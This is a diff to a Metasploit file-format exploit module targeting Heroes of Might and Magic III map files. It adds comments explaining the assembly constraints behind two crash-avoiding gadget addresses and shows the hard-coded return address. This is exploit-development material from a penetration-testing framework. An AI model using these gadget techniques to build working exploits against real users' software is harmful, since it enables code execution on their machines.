diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb index 4682a3d5bd..75b8facb0e 100644 --- a/modules/exploits/windows/fileformat/homm3_h3m.rb +++ b/modules/exploits/windows/fileformat/homm3_h3m.rb @@ -39,7 +39,32 @@ class Metasploit3 < Msf::Exploit::Remote [ 'H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]', { + # Two "Anticrash"-gadgets are needed or the game will crash before ret + # + # Anticrash1, needs to pass the following code down to final JMP: + # MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4] + # XOR EBX, EBX + # CMP EAX, EBX + # JE SHORT ; JMP to crash if EAX is 0 + # MOV CL, BYTE PTR DS : [EAX - 1] + # CMP CL, BL + # JE SHORT ; JMP to crash if the byte before [EAX] is 0 + # CMP CL, 0FF + # JE SHORT ; JMP to crash if the byte before [EAX] is 0xFF + # CMP EDI, EBX + # JNE ; JMP to good spot. Always occurs if we get this far + # + # Summary: An address which when incremented by 4 and then dereferenced + # leads to for example a string which is preceeded neither by a 0x00 or 0xFF 'Anticrash1' => 0x004497D4, + # Anticrash2, needs to return out of the following call (tricky): + # + # MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2] + # CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4] + # + # Summary: An address which when dereferenced leads to an address that + # when incremented by 4 and then deferenced leads to a function returning + # without accessing any registers/memory that would cause a crash. 'Anticrash2' => 0x006A6430, 'Ret' => 0x004EFF87, # CALL [ESP] Heroes3.exe }